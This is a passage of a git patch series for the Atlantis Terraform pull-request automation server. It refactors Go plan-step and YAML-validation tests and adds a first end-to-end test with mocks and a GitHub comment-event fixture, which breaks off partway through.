-1,7 +1,6 @@ package runtime_test import ( - "errors" "io/ioutil" "os" "path/filepath" @@ -9,7 +8,9 @@ import ( "github.com/hashicorp/go-version" . 
"github.com/petergtz/pegomock" + "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" @@ -25,23 +26,20 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: workspace, - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + DefaultTFVersion: tfVersion, + TerraformExecutor: terraform, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). 
ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + CommentArgs: []string{"comment", "args"}, + Workspace: workspace, + RepoRelPath: ".", + User: models.User{Username: "username"}, + }, []string{"extra", "args"}, "/path") Ok(t, err) Equals(t, "output", output) @@ -61,23 +59,19 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: workspace, - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). 
ThenReturn("output", nil) - _, err := s.Run() + _, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: workspace, + RepoRelPath: ".", + User: models.User{Username: "username"}, + }, []string{"extra", "args"}, "/path") ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err) } @@ -112,23 +106,21 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). 
ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + RepoRelPath: ".", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, "/path") Ok(t, err) Equals(t, "output", output) @@ -170,18 +162,9 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } // Ensure that we actually try to switch workspaces by making the @@ -194,7 +177,13 @@ func TestRun_CreatesWorkspace(t *testing.T) { expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + RepoRelPath: ".", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, "/path") Ok(t, err) Equals(t, "output", output) @@ -212,26 +201,22 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: "/path", - DirRelativeToRepoRoot: 
".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } - When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil) expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + RepoRelPath: ".", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, "/path") Ok(t, err) Equals(t, "output", output) @@ -258,28 +243,25 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. 
tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: tmpDir, - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile} When(terraform.RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + RepoRelPath: ".", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, tmpDir) Ok(t, err) - Equals(t, "output", output) // Verify that env select was never called since we're in version >= 0.10 terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, tmpDir, []string{"env", "select", "-no-color", "workspace"}, tfVersion, "workspace") terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace") + Equals(t, "output", output) } diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index 51fa1ca702..15bcd19602 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -6,6 +6,7 @@ import ( "path/filepath" "testing" + "github.com/hashicorp/go-version" "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/events/yaml/valid" . 
"github.com/runatlantis/atlantis/testing" @@ -72,6 +73,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) { } func TestReadConfig(t *testing.T) { + tfVersion, _ := version.NewVersion("v0.11.0") cases := []struct { description string input string @@ -169,7 +171,7 @@ workflows: Dir: ".", Workspace: "myworkspace", Workflow: String("myworkflow"), - TerraformVersion: String("v0.11.0"), + TerraformVersion: tfVersion, Autoplan: valid.Autoplan{ WhenModified: []string{"**/*.tf"}, Enabled: true, @@ -203,7 +205,7 @@ workflows: Dir: ".", Workspace: "myworkspace", Workflow: String("myworkflow"), - TerraformVersion: String("v0.11.0"), + TerraformVersion: tfVersion, Autoplan: valid.Autoplan{ WhenModified: []string{"**/*.tf"}, Enabled: false, diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go index 3273cb38a1..29335e7954 100644 --- a/server/events/yaml/raw/project.go +++ b/server/events/yaml/raw/project.go @@ -1,12 +1,12 @@ package raw import ( - "errors" "fmt" "strings" "github.com/go-ozzo/ozzo-validation" "github.com/hashicorp/go-version" + "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/yaml/valid" ) @@ -41,11 +41,12 @@ func (p Project) Validate() error { return nil } validTFVersion := func(value interface{}) error { - // Safe to dereference because this is only called if the pointer is - // not nil. 
- versionStr := *value.(*string) - _, err := version.NewVersion(versionStr) - return err + strPtr := value.(*string) + if strPtr == nil { + return nil + } + _, err := version.NewVersion(*strPtr) + return errors.Wrapf(err, "version %q could not be parsed", *strPtr) } return validation.ValidateStruct(&p, validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)), diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go index 9c06914896..b10452afeb 100644 --- a/server/events/yaml/raw/project_test.go +++ b/server/events/yaml/raw/project_test.go @@ -4,6 +4,7 @@ import ( "testing" "github.com/go-ozzo/ozzo-validation" + "github.com/hashicorp/go-version" "github.com/runatlantis/atlantis/server/events/yaml/raw" "github.com/runatlantis/atlantis/server/events/yaml/valid" . "github.com/runatlantis/atlantis/testing" @@ -107,6 +108,30 @@ func TestProject_Validate(t *testing.T) { }, expErr: "", }, + { + description: "empty tf version string", + input: raw.Project{ + Dir: String("."), + TerraformVersion: String(""), + }, + expErr: "terraform_version: version \"\" could not be parsed: Malformed version: .", + }, + { + description: "tf version with v prepended", + input: raw.Project{ + Dir: String("."), + TerraformVersion: String("v1"), + }, + expErr: "", + }, + { + description: "tf version without prepended", + input: raw.Project{ + Dir: String("."), + TerraformVersion: String("1"), + }, + expErr: "", + }, } validation.ErrorTag = "yaml" for _, c := range cases { @@ -122,6 +147,7 @@ func TestProject_Validate(t *testing.T) { } func TestProject_ToValid(t *testing.T) { + tfVersionPointEleven, _ := version.NewVersion("v0.11.0") cases := []struct { description string input raw.Project @@ -161,7 +187,7 @@ func TestProject_ToValid(t *testing.T) { Dir: ".", Workspace: "myworkspace", Workflow: String("myworkflow"), - TerraformVersion: String("v0.11.0"), + TerraformVersion: tfVersionPointEleven, Autoplan: valid.Autoplan{ WhenModified: 
[]string{"hi"}, Enabled: false, @@ -169,6 +195,22 @@ func TestProject_ToValid(t *testing.T) { ApplyRequirements: []string{"approved"}, }, }, + { + description: "tf version without 'v'", + input: raw.Project{ + Dir: String("."), + TerraformVersion: String("0.11.0"), + }, + exp: valid.Project{ + Dir: ".", + Workspace: "default", + TerraformVersion: tfVersionPointEleven, + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + }, } for _, c := range cases { t.Run(c.description, func(t *testing.T) { diff --git a/server/events_controller_test.go b/server/events_controller_test.go index 7997a56d8a..bb0682ba6f 100644 --- a/server/events_controller_test.go +++ b/server/events_controller_test.go @@ -293,31 +293,6 @@ func TestPost_GithubCommentSuccess(t *testing.T) { cr.VerifyWasCalledOnce().ExecuteCommand(baseRepo, baseRepo, user, 1, &cmd) } -func TestPost_GithubPullRequestNotClosed(t *testing.T) { - t.Log("when the event is a github pull reuqest but it's not a closed event we ignore it") - e, v, _, _, _, _, _, _ := setup(t) - req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) - req.Header.Set(githubHeader, "pull_request") - event := `{"action": "opened"}` - When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) - w := httptest.NewRecorder() - e.Post(w, req) - responseContains(t, w, http.StatusOK, "Ignoring opened pull request event") -} - -func TestPost_GitlabMergeRequestNotClosed(t *testing.T) { - t.Log("when the event is a gitlab merge request but it's not a closed event we ignore it") - e, _, gl, p, _, _, _, _ := setup(t) - req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) - req.Header.Set(gitlabHeader, "value") - event := gitlab.MergeEvent{} - When(gl.Validate(req, secret)).ThenReturn(event, nil) - When(p.ParseGitlabMergeEvent(event)).ThenReturn(models.PullRequest{State: models.Open}, models.Repo{}, nil) - w := httptest.NewRecorder() - e.Post(w, req) - responseContains(t, w, http.StatusOK, "Ignoring opened 
pull request event") -} - func TestPost_GithubPullRequestInvalid(t *testing.T) { t.Log("when the event is a github pull request with invalid data we return a 400") e, v, _, p, _, _, _, _ := setup(t) @@ -383,15 +358,14 @@ func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) { } func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) { - t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 503") + t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 500") e, _, gl, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - event := gitlab.MergeEvent{} - When(gl.Validate(req, secret)).ThenReturn(event, nil) + When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} - When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil) + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) When(c.CleanUpPull(repo, pullRequest)).ThenReturn(errors.New("err")) w := httptest.NewRecorder() e.Post(w, req) @@ -421,11 +395,10 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) { e, _, gl, p, _, _, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - event := gitlab.MergeEvent{} - When(gl.Validate(req, secret)).ThenReturn(event, nil) + When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} - When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil) + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusOK, "Pull request cleaned successfully") @@ -458,3 +431,60 @@ func setup(t *testing.T) 
(server.EventsController, *mocks.MockGithubRequestValid } return e, v, gl, p, cr, c, vcsmock, cp } + +var gitlabMergeEvent = gitlab.MergeEvent{ + ObjectAttributes: struct { + ID int `json:"id"` + TargetBranch string `json:"target_branch"` + SourceBranch string `json:"source_branch"` + SourceProjectID int `json:"source_project_id"` + AuthorID int `json:"author_id"` + AssigneeID int `json:"assignee_id"` + Title string `json:"title"` + CreatedAt string `json:"created_at"` + UpdatedAt string `json:"updated_at"` + StCommits []*gitlab.Commit `json:"st_commits"` + StDiffs []*gitlab.Diff `json:"st_diffs"` + MilestoneID int `json:"milestone_id"` + State string `json:"state"` + MergeStatus string `json:"merge_status"` + TargetProjectID int `json:"target_project_id"` + IID int `json:"iid"` + Description string `json:"description"` + Position int `json:"position"` + LockedAt string `json:"locked_at"` + UpdatedByID int `json:"updated_by_id"` + MergeError string `json:"merge_error"` + MergeParams struct { + ForceRemoveSourceBranch string `json:"force_remove_source_branch"` + } `json:"merge_params"` + MergeWhenBuildSucceeds bool `json:"merge_when_build_succeeds"` + MergeUserID int `json:"merge_user_id"` + MergeCommitSha string `json:"merge_commit_sha"` + DeletedAt string `json:"deleted_at"` + ApprovalsBeforeMerge string `json:"approvals_before_merge"` + RebaseCommitSha string `json:"rebase_commit_sha"` + InProgressMergeCommitSha string `json:"in_progress_merge_commit_sha"` + LockVersion int `json:"lock_version"` + TimeEstimate int `json:"time_estimate"` + Source *gitlab.Repository `json:"source"` + Target *gitlab.Repository `json:"target"` + LastCommit struct { + ID string `json:"id"` + Message string `json:"message"` + Timestamp *time.Time `json:"timestamp"` + URL string `json:"url"` + Author *gitlab.Author `json:"author"` + } `json:"last_commit"` + WorkInProgress bool `json:"work_in_progress"` + URL string `json:"url"` + Action string `json:"action"` + Assignee struct { + Name 
string `json:"name"` + Username string `json:"username"` + AvatarURL string `json:"avatar_url"` + } `json:"assignee"` + }{ + Action: "merge", + }, +} diff --git a/server/logging/simple_logger.go b/server/logging/simple_logger.go index eca5778e4f..ddb56ebcd4 100644 --- a/server/logging/simple_logger.go +++ b/server/logging/simple_logger.go @@ -23,8 +23,6 @@ import ( "unicode" ) -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_simple_logging.go SimpleLogging - // SimpleLogging is the interface that our SimpleLogger implements. // It's really only used for mocking when we need to test what's being logged. type SimpleLogging interface { diff --git a/server/server.go b/server/server.go index fe6e3f7b5f..734a36de4d 100644 --- a/server/server.go +++ b/server/server.go @@ -232,7 +232,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { Logger: logger, AllowForkPRs: userConfig.AllowForkPRs, AllowForkPRsFlag: config.AllowForkPRsFlag, - PullRequestOperator: events.PullRequestOperator{ + PullRequestOperator: &events.DefaultPullRequestOperator{ TerraformExecutor: terraformClient, DefaultTFVersion: defaultTfVersion, ParserValidator: &yaml.ParserValidator{}, From e97b98e4a04c71c5b2d1f7ef3a215e22a40d0cca Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 15 Jun 2018 17:52:14 +0100 Subject: [PATCH 23/69] Add first e2e test with mocks. 
--- server/events/project_operator.go | 7 +- server/events_controller.go | 14 +- server/events_controller_e2e_test.go | 210 ++++++++++++++++++ .../testfixtures/githubIssueCommentEvent.json | 207 +++++++++++++++++ .../simple/exp-output-atlantis-plan.txt | 23 ++ server/testfixtures/test-repos/simple/main.tf | 3 + 6 files changed, 459 insertions(+), 5 deletions(-) create mode 100644 server/events_controller_e2e_test.go create mode 100644 server/testfixtures/githubIssueCommentEvent.json create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt create mode 100644 server/testfixtures/test-repos/simple/main.tf diff --git a/server/events/project_operator.go b/server/events/project_operator.go index 37dfcb5f01..2c6c5c558b 100644 --- a/server/events/project_operator.go +++ b/server/events/project_operator.go @@ -22,6 +22,7 @@ import ( "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/webhooks" "github.com/runatlantis/atlantis/server/events/yaml/valid" + "github.com/runatlantis/atlantis/server/logging" ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator @@ -30,6 +31,10 @@ type LockURLGenerator interface { GenerateLockURL(lockID string) string } +type WebhooksSender interface { + Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error +} + // PlanSuccess is the result of a successful plan. 
type PlanSuccess struct { TerraformOutput string @@ -45,7 +50,7 @@ type ProjectOperator struct { RunStepOperator runtime.RunStepOperator ApprovalOperator runtime.ApprovalOperator Workspace AtlantisWorkspace - Webhooks *webhooks.MultiWebhookSender + Webhooks WebhooksSender } func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult { diff --git a/server/events_controller.go b/server/events_controller.go index b5b3c73300..b205f2eb8d 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -55,6 +55,7 @@ type EventsController struct { AtlantisGithubUser models.User // AtlantisGitlabUser is the user that atlantis is running as for Gitlab. AtlantisGitlabUser models.User + TestingMode bool } // Post handles POST webhook requests. @@ -254,11 +255,16 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo return } - // Respond with success and then actually execute the command asynchronously. - // We use a goroutine so that this function returns and the connection is - // closed. fmt.Fprintln(w, "Processing...") - go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + if !e.TestingMode { + // Respond with success and then actually execute the command asynchronously. + // We use a goroutine so that this function returns and the connection is + // closed. + go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + } else { + // When testing we want to wait for everything to complete. 
+ e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + } } // HandleGitlabMergeRequestEvent will delete any locks associated with the pull diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go new file mode 100644 index 0000000000..97883c0a14 --- /dev/null +++ b/server/events_controller_e2e_test.go @@ -0,0 +1,210 @@ +package server_test + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/google/go-github/github" + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server" + "github.com/runatlantis/atlantis/server/events" + "github.com/runatlantis/atlantis/server/events/locking" + "github.com/runatlantis/atlantis/server/events/locking/boltdb" + "github.com/runatlantis/atlantis/server/events/mocks" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/runtime" + "github.com/runatlantis/atlantis/server/events/terraform" + vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" + "github.com/runatlantis/atlantis/server/events/webhooks" + "github.com/runatlantis/atlantis/server/events/yaml" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +func Test(t *testing.T) { + RegisterMockTestingT(t) + + // Config. + allowForkPRs := false + dataDir, cleanup := TempDir(t) + defer cleanup() + + // Mocks. + e2eVCSClient := vcsmocks.NewMockClientProxy() + e2eStatusUpdater := mocks.NewMockCommitStatusUpdater() + e2eGithubGetter := mocks.NewMockGithubPullGetter() + e2eGitlabGetter := mocks.NewMockGitlabMergeRequestGetter() + e2eWorkspace := mocks.NewMockAtlantisWorkspace() + + // Real dependencies. 
+ logger := logging.NewSimpleLogger("server", nil, true, logging.Debug) + eventParser := &events.EventParser{ + GithubUser: "github-user", + GithubToken: "github-token", + GitlabUser: "gitlab-user", + GitlabToken: "gitlab-token", + } + commentParser := &events.CommentParser{ + GithubUser: "github-user", + GithubToken: "github-token", + GitlabUser: "gitlab-user", + GitlabToken: "gitlab-token", + } + terraformClient, err := terraform.NewClient(dataDir) + Ok(t, err) + boltdb, err := boltdb.New(dataDir) + Ok(t, err) + lockingClient := locking.NewClient(boltdb) + projectLocker := &events.DefaultProjectLocker{ + Locker: lockingClient, + } + + defaultTFVersion := terraformClient.Version() + commandHandler := &events.CommandHandler{ + EventParser: eventParser, + VCSClient: e2eVCSClient, + GithubPullGetter: e2eGithubGetter, + GitlabMergeRequestGetter: e2eGitlabGetter, + CommitStatusUpdater: e2eStatusUpdater, + AtlantisWorkspaceLocker: events.NewDefaultAtlantisWorkspaceLocker(), + MarkdownRenderer: &events.MarkdownRenderer{}, + Logger: logger, + AllowForkPRs: allowForkPRs, + AllowForkPRsFlag: "allow-fork-prs", + PullRequestOperator: &events.DefaultPullRequestOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: e2eVCSClient, + Workspace: e2eWorkspace, + ProjectOperator: events.ProjectOperator{ + Locker: projectLocker, + LockURLGenerator: &mockLockURLGenerator{}, + InitStepOperator: runtime.InitStepOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + }, + PlanStepOperator: runtime.PlanStepOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + }, + ApplyStepOperator: runtime.ApplyStepOperator{ + TerraformExecutor: terraformClient, + }, + RunStepOperator: runtime.RunStepOperator{}, + ApprovalOperator: runtime.ApprovalOperator{ + VCSClient: e2eVCSClient, + }, + Workspace: 
e2eWorkspace, + Webhooks: &mockWebhookSender{}, + }, + }, + } + + ctrl := server.EventsController{ + TestingMode: true, + CommandRunner: commandHandler, + PullCleaner: nil, + Logger: logger, + Parser: eventParser, + CommentParser: commentParser, + GithubWebHookSecret: nil, + GithubRequestValidator: &server.DefaultGithubRequestValidator{}, + GitlabRequestParser: &server.DefaultGitlabRequestParser{}, + GitlabWebHookSecret: nil, + RepoWhitelist: &events.RepoWhitelist{ + Whitelist: "*", + }, + SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github}, + VCSClient: e2eVCSClient, + AtlantisGithubUser: models.User{ + Username: "atlantisbot", + }, + AtlantisGitlabUser: models.User{ + Username: "atlantisbot", + }, + } + + // Test GitHub Post + req := GitHubCommentEvent(t, "atlantis plan") + w := httptest.NewRecorder() + When(e2eGithubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil) + testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple") + Ok(t, err) + When(e2eWorkspace.Clone(matchers.AnyPtrToLoggingSimpleLogger(), AnyRepo(), AnyRepo(), matchers.AnyModelsPullRequest(), AnyString())).ThenReturn(testRepoDir, nil) + // Clean up .terraform and plan files when we're done. 
+ defer func() { + os.RemoveAll(filepath.Join(testRepoDir, ".terraform")) + planFiles, _ := filepath.Glob(testRepoDir + "/*.tfplan") + for _, file := range planFiles { + os.Remove(file) + } + }() + + ctrl.Post(w, req) + responseContains(t, w, 200, "Processing...") + _, _, comment := e2eVCSClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + + exp, err := ioutil.ReadFile(filepath.Join(testRepoDir, "exp-output-atlantis-plan.txt")) + fmt.Println((string(exp))) + Ok(t, err) + + Equals(t, string(exp), comment) +} + +type mockLockURLGenerator struct{} + +func (m *mockLockURLGenerator) GenerateLockURL(lockID string) string { + return "lock-url" +} + +type mockWebhookSender struct{} + +func (w *mockWebhookSender) Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error { + return nil +} + +func GitHubCommentEvent(t *testing.T, comment string) *http.Request { + requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent.json")) + Ok(t, err) + requestJSON = []byte(strings.Replace(string(requestJSON), "###comment body###", comment, 1)) + req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON)) + Ok(t, err) + req.Header.Set("Content-Type", "application/json") + req.Header.Set(githubHeader, "issue_comment") + return req +} + +func GitHubPullRequestParsed() *github.PullRequest { + return &github.PullRequest{ + Number: github.Int(1), + State: github.String("open"), + HTMLURL: github.String("htmlurl"), + Head: &github.PullRequestBranch{ + Repo: &github.Repository{ + FullName: github.String("runatlantis/atlantis-tests"), + CloneURL: github.String("/runatlantis/atlantis-tests.git"), + }, + SHA: github.String("sha"), + Ref: github.String("branch"), + }, + Base: &github.PullRequestBranch{ + Repo: &github.Repository{ + FullName: github.String("runatlantis/atlantis-tests"), + CloneURL: github.String("/runatlantis/atlantis-tests.git"), + }, + }, + User: &github.User{ + Login: 
github.String("atlantisbot"), + }, + } +} diff --git a/server/testfixtures/githubIssueCommentEvent.json b/server/testfixtures/githubIssueCommentEvent.json new file mode 100644 index 0000000000..a15f67ed4a --- /dev/null +++ b/server/testfixtures/githubIssueCommentEvent.json @@ -0,0 +1,207 @@ +{ + "action": "created", + "issue": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1", + "repository_url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/labels{/name}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/events", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1", + "id": 330256251, + "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3", + "number": 1, + "title": "Add new project layouts", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + 
